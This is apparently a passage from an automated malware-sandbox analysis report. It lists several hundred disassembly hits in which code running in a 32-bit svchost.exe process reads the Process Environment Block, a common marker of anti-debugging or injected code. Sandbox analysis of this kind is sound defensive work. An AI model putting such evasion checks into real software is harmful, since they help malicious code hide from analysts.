                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2F172 mov eax, dword ptr fs:[00000030h]13_2_03A2F172
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AC9179 mov eax, dword ptr fs:[00000030h]13_2_03AC9179
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03B05152 mov eax, dword ptr fs:[00000030h]13_2_03B05152
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AC4144 mov eax, dword ptr fs:[00000030h]13_2_03AC4144
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AC4144 mov eax, dword ptr fs:[00000030h]13_2_03AC4144
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AC4144 mov ecx, dword ptr fs:[00000030h]13_2_03AC4144
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AC4144 mov eax, dword ptr fs:[00000030h]13_2_03AC4144
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AC4144 mov eax, dword ptr fs:[00000030h]13_2_03AC4144
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A29148 mov eax, dword ptr fs:[00000030h]13_2_03A29148
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A29148 mov eax, dword ptr fs:[00000030h]13_2_03A29148
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A29148 mov eax, dword ptr fs:[00000030h]13_2_03A29148
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A29148 mov eax, dword ptr fs:[00000030h]13_2_03A29148
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A37152 mov eax, dword ptr fs:[00000030h]13_2_03A37152
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2C156 mov eax, dword ptr fs:[00000030h]13_2_03A2C156
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A36154 mov eax, dword ptr fs:[00000030h]13_2_03A36154
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A36154 mov eax, dword ptr fs:[00000030h]13_2_03A36154
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF60B8 mov eax, dword ptr fs:[00000030h]13_2_03AF60B8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03AF60B8 mov ecx, dword ptr fs:[00000030h]13_2_03AF60B8
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A3208A mov eax, dword ptr fs:[00000030h]13_2_03A3208A
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2D08D mov eax, dword ptr fs:[00000030h]13_2_03A2D08D
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A35096 mov eax, dword ptr fs:[00000030h]13_2_03A35096
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5D090 mov eax, dword ptr fs:[00000030h]13_2_03A5D090
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A5D090 mov eax, dword ptr fs:[00000030h]13_2_03A5D090
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A6909C mov eax, dword ptr fs:[00000030h]13_2_03A6909C
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A550E4 mov eax, dword ptr fs:[00000030h]13_2_03A550E4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A550E4 mov ecx, dword ptr fs:[00000030h]13_2_03A550E4
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2A0E3 mov ecx, dword ptr fs:[00000030h]13_2_03A2A0E3
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A380E9 mov eax, dword ptr fs:[00000030h]13_2_03A380E9
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A2C0F0 mov eax, dword ptr fs:[00000030h]13_2_03A2C0F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A720F0 mov ecx, dword ptr fs:[00000030h]13_2_03A720F0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A470C0 mov eax, dword ptr fs:[00000030h]13_2_03A470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A470C0 mov ecx, dword ptr fs:[00000030h]13_2_03A470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A470C0 mov ecx, dword ptr fs:[00000030h]13_2_03A470C0
                  Source: C:\Windows\SysWOW64\svchost.exeCode function: 13_2_03A470C0 mov eax, dword ptr fs:[00000030h]13_2_03A470C0
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A470C0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A470C0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A470C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A470C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A470C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A470C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A470C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A470C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A470C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A470C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A470C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A470C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A470C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A470C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03B050D9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AB20DE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A590DB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A2A020 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A2C020 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AF903E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AF903E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AF903E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AF903E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A4E016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A4E016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A4E016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A4E016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03B05060 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A41070 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A41070 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A41070 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A41070 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A41070 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A41070 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A41070 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A41070 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A41070 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A41070 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A41070 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A41070 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A41070 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A5C073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A32050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AD705E mov ebx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AD705E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A5B052 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AB97A9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03ABF7AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03ABF7AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03ABF7AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03ABF7AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03ABF7AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03B037B6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A307AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A5D7B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A2F7BA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A2F7BA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A2F7BA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A2F7BA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A2F7BA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A2F7BA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A2F7BA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A2F7BA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A2F7BA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AEF78A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A3D7E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A527ED mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A527ED mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A527ED mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A347FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A347FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A3C7C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A357C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A357C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A357C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AEF72E mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A33720 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A4F720 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A4F720 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A4F720 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AF972B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A6C720 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A6C720 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03B0B73C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03B0B73C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03B0B73C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03B0B73C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A29730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A29730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A65734 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A3973A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A3973A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A6273C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A6273C mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A6273C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AAC730 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A37703 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A35702 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A35702 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A6C700 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A30710 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A60710 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A6F71F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A6F71F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A2B765 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A2B765 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A2B765 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A2B765 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A38770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A40770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A40770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A40770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A40770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A40770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A40770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A40770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A40770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A40770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A40770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A40770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A40770 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A43740 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A43740 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A43740 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A6674D mov esi, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A6674D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A6674D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A30750 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A72750 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A72750 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03B03749 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AB4755 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A6C6A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A2D6AA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A2D6AA mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A276B2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A276B2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A276B2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A666B0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AB368C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AB368C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AB368C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AB368C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A34690 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A34690 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AC36EE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AC36EE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AC36EE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AC36EE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AC36EE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AC36EE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A5D6E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A5D6E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A636EF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AAE6F2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AB06F1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AB06F1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AED6F0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A6A6C7 mov ebx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A6A6C7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A3B6C0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AF16CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AF16CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AF16CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AF16CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AEF6C7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A616CF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A4E627 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A2F626 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A2F626 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A2F626 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A2F626 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A2F626 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A2F626 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A2F626 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A2F626 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A2F626 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A66620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03B05636 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A68620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A3262C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A61607 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03AAE609 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A6F603 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A4260B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A4260B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A4260B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A4260B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\svchost.exe | Code function: 13_2_03A4260B mov eax, dword ptr fs:[00000030h]
